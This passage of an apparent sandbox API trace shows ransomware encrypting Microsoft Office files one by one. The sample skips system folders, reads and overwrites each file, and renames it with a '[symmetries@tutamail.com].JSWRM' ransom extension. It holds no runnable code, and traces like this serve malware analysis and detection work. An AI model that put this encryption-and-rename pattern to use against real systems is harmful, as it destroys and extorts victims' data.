lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DGZIP.DPV", lpUsedDefaultChar=0x0) returned 9 [0141.296] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0141.296] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0141.296] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGZIP.DPV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgzip.dpv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0141.474] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3072) returned 1 [0141.474] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.474] ReadFile (in: hFile=0x238, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0xc00, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e89c*=0xc00, lpOverlapped=0x0) returned 1 [0141.550] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.550] WriteFile (in: hFile=0x238, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0xc00, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e898*=0xc00, lpOverlapped=0x0) returned 1 [0141.550] CloseHandle (hObject=0x238) returned 1 [0141.550] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGZIP.DPV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgzip.dpv"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGZIP.DPV.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgzip.dpv.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0141.552] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcc74eab3, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcc74eab3, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcc74eab3, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xd6, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="DGZIPC.XML", cAlternateFileName="")) returned 1 [0141.553] lstrcmpiW (lpString1="DGZIPC.XML", lpString2=".") returned 1 [0141.553] lstrcmpiW (lpString1="DGZIPC.XML", lpString2="..") returned 1 [0141.553] lstrcmpiW (lpString1="DGZIPC.XML", lpString2="...") returned 1 [0141.553] lstrcmpiW (lpString1="DGZIPC.XML", lpString2="windows") returned -1 [0141.553] lstrcmpiW (lpString1="DGZIPC.XML", lpString2="recovery") returned -1 [0141.553] lstrcmpiW (lpString1="DGZIPC.XML", lpString2="perflogs") returned -1 [0141.553] lstrcmpiW (lpString1="DGZIPC.XML", lpString2="documents and settings") returned -1 [0141.553] lstrcmpiW (lpString1="DGZIPC.XML", lpString2="$RECYCLE.BIN") returned 1 [0141.553] lstrcmpiW (lpString1="DGZIPC.XML", lpString2="system volume information") returned -1 [0141.553] lstrcmpiW (lpString1="DGZIPC.XML", lpString2="msocache") returned -1 [0141.553] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGZIPC.XML", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0141.553] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGZIPC.XML", cchWideChar=10, lpMultiByteStr=0x345ebd8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DGZIPC.XML", lpUsedDefaultChar=0x0) returned 10 [0141.553] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGZIPC.XML", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0141.553] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGZIPC.XML", cchWideChar=10, lpMultiByteStr=0x345eba8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DGZIPC.XML", lpUsedDefaultChar=0x0) returned 10 [0141.553] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0141.553] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0141.553] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGZIPC.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgzipc.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0141.554] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=214) returned 1 [0141.554] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.554] ReadFile (in: hFile=0x238, lpBuffer=0x22f0d8, nNumberOfBytesToRead=0xd0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x22f0d8*, lpNumberOfBytesRead=0x345e89c*=0xd0, lpOverlapped=0x0) returned 1 [0141.555] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.555] WriteFile (in: hFile=0x238, lpBuffer=0x22f0d8*, nNumberOfBytesToWrite=0xd0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x22f0d8*, lpNumberOfBytesWritten=0x345e898*=0xd0, lpOverlapped=0x0) returned 1 [0141.555] CloseHandle (hObject=0x238) returned 1 [0141.555] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGZIPC.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgzipc.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGZIPC.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgzipc.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0141.556] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x21a53b55, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x21a53b55, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x21a79da4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1c56, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="DOTS.POC", cAlternateFileName="")) returned 1 [0141.556] lstrcmpiW (lpString1="DOTS.POC", lpString2=".") returned 1 [0141.556] lstrcmpiW (lpString1="DOTS.POC", lpString2="..") returned 1 [0141.556] lstrcmpiW (lpString1="DOTS.POC", lpString2="...") returned 1 [0141.556] lstrcmpiW (lpString1="DOTS.POC", lpString2="windows") returned -1 [0141.556] lstrcmpiW (lpString1="DOTS.POC", lpString2="recovery") returned -1 [0141.556] lstrcmpiW (lpString1="DOTS.POC", lpString2="perflogs") returned -1 [0141.556] lstrcmpiW (lpString1="DOTS.POC", lpString2="documents and settings") returned 1 [0141.556] lstrcmpiW (lpString1="DOTS.POC", lpString2="$RECYCLE.BIN") returned 1 [0141.557] lstrcmpiW (lpString1="DOTS.POC", lpString2="system volume information") returned -1 [0141.557] lstrcmpiW (lpString1="DOTS.POC", lpString2="msocache") returned -1 [0141.557] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DOTS.POC", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0141.557] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DOTS.POC", cchWideChar=8, lpMultiByteStr=0x345ebd8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DOTS.POC", lpUsedDefaultChar=0x0) returned 8 [0141.557] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DOTS.POC", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0141.557] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DOTS.POC", cchWideChar=8, lpMultiByteStr=0x345eba8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DOTS.POC", lpUsedDefaultChar=0x0) returned 8 [0141.557] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0141.557] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0141.557] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DOTS.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dots.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0141.558] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=7254) returned 1 [0141.558] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.558] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x1c50, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x1c50, lpOverlapped=0x0) returned 1 [0141.560] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.560] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x1c50, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x1c50, lpOverlapped=0x0) returned 1 [0141.560] CloseHandle (hObject=0x238) returned 1 [0141.560] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DOTS.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dots.poc"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DOTS.POC.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dots.poc.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0141.561] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x21a53b55, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x21a53b55, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x21a79da4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x10c34, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="DVDHM.POC", cAlternateFileName="")) returned 1 [0141.562] lstrcmpiW (lpString1="DVDHM.POC", lpString2=".") returned 1 [0141.562] lstrcmpiW (lpString1="DVDHM.POC", lpString2="..") returned 1 [0141.562] lstrcmpiW (lpString1="DVDHM.POC", lpString2="...") returned 1 [0141.562] lstrcmpiW (lpString1="DVDHM.POC", lpString2="windows") returned -1 [0141.562] lstrcmpiW (lpString1="DVDHM.POC", lpString2="recovery") returned -1 [0141.562] lstrcmpiW (lpString1="DVDHM.POC", lpString2="perflogs") returned -1 [0141.562] lstrcmpiW (lpString1="DVDHM.POC", lpString2="documents and settings") returned 1 [0141.562] lstrcmpiW (lpString1="DVDHM.POC", lpString2="$RECYCLE.BIN") returned 1 [0141.562] lstrcmpiW (lpString1="DVDHM.POC", lpString2="system volume information") returned -1 [0141.562] lstrcmpiW (lpString1="DVDHM.POC", lpString2="msocache") returned -1 [0141.562] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DVDHM.POC", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0141.562] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DVDHM.POC", cchWideChar=9, lpMultiByteStr=0x345ebd8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DVDHM.POC", lpUsedDefaultChar=0x0) returned 9 [0141.562] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DVDHM.POC", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0141.562] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DVDHM.POC", cchWideChar=9, lpMultiByteStr=0x345eba8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DVDHM.POC", lpUsedDefaultChar=0x0) returned 9 [0141.562] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0141.562] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0141.562] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DVDHM.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dvdhm.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0141.563] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=68660) returned 1 [0141.563] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.563] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x10c30, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x10c30, lpOverlapped=0x0) returned 1 [0141.569] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.569] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x10c30, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x10c30, lpOverlapped=0x0) returned 1 [0141.569] CloseHandle (hObject=0x238) returned 1 [0141.569] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DVDHM.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dvdhm.poc"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DVDHM.POC.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dvdhm.poc.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0141.570] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x21a53b55, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x21a53b55, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x21a53b55, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x7dc55, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="EMAIL.DPV", cAlternateFileName="")) returned 1 [0141.571] lstrcmpiW (lpString1="EMAIL.DPV", lpString2=".") returned 1 [0141.571] lstrcmpiW (lpString1="EMAIL.DPV", lpString2="..") returned 1 [0141.571] lstrcmpiW (lpString1="EMAIL.DPV", lpString2="...") returned 1 [0141.571] lstrcmpiW (lpString1="EMAIL.DPV", lpString2="windows") returned -1 [0141.571] lstrcmpiW (lpString1="EMAIL.DPV", lpString2="recovery") returned -1 [0141.571] lstrcmpiW (lpString1="EMAIL.DPV", lpString2="perflogs") returned -1 [0141.571] lstrcmpiW (lpString1="EMAIL.DPV", lpString2="documents and settings") returned 1 [0141.571] lstrcmpiW (lpString1="EMAIL.DPV", lpString2="$RECYCLE.BIN") returned 1 [0141.571] lstrcmpiW (lpString1="EMAIL.DPV", lpString2="system volume information") returned -1 [0141.571] lstrcmpiW (lpString1="EMAIL.DPV", lpString2="msocache") returned -1 [0141.571] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EMAIL.DPV", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0141.571] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EMAIL.DPV", cchWideChar=9, lpMultiByteStr=0x345ebd8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EMAIL.DPV", lpUsedDefaultChar=0x0) returned 9 [0141.571] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EMAIL.DPV", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0141.571] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EMAIL.DPV", cchWideChar=9, lpMultiByteStr=0x345eba8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EMAIL.DPV", lpUsedDefaultChar=0x0) returned 9 [0141.571] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0141.571] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0141.571] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\EMAIL.DPV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\email.dpv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0141.572] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=515157) returned 1 [0141.572] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.572] ReadFile (in: hFile=0x238, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0141.583] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.583] WriteFile (in: hFile=0x238, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0141.619] CloseHandle (hObject=0x238) returned 1 [0141.619] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\EMAIL.DPV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\email.dpv"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\EMAIL.DPV.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\email.dpv.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0141.621] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x21a53b55, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x21a53b55, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x21a79da4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xd066, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="EMAIL.XML", cAlternateFileName="")) returned 1 [0141.621] lstrcmpiW (lpString1="EMAIL.XML", lpString2=".") returned 1 [0141.622] lstrcmpiW (lpString1="EMAIL.XML", lpString2="..") returned 1 [0141.622] lstrcmpiW (lpString1="EMAIL.XML", lpString2="...") returned 1 [0141.622] lstrcmpiW (lpString1="EMAIL.XML", lpString2="windows") returned -1 [0141.622] lstrcmpiW (lpString1="EMAIL.XML", lpString2="recovery") returned -1 [0141.622] lstrcmpiW (lpString1="EMAIL.XML", lpString2="perflogs") returned -1 [0141.622] lstrcmpiW (lpString1="EMAIL.XML", lpString2="documents and settings") returned 1 [0141.622] lstrcmpiW (lpString1="EMAIL.XML", lpString2="$RECYCLE.BIN") returned 1 [0141.622] lstrcmpiW (lpString1="EMAIL.XML", lpString2="system volume information") returned -1 [0141.622] lstrcmpiW (lpString1="EMAIL.XML", lpString2="msocache") returned -1 [0141.622] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EMAIL.XML", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0141.622] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EMAIL.XML", cchWideChar=9, lpMultiByteStr=0x345ebd8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EMAIL.XML", lpUsedDefaultChar=0x0) returned 9 [0141.622] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EMAIL.XML", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0141.622] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EMAIL.XML", cchWideChar=9, lpMultiByteStr=0x345eba8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EMAIL.XML", lpUsedDefaultChar=0x0) returned 9 [0141.622] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0141.622] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0141.622] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\EMAIL.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\email.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0141.623] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=53350) returned 1 [0141.623] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.623] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0xd060, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0xd060, lpOverlapped=0x0) returned 1 [0141.628] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.628] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0xd060, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0xd060, lpOverlapped=0x0) returned 1 [0141.628] CloseHandle (hObject=0x238) returned 1 [0141.628] MoveFileW 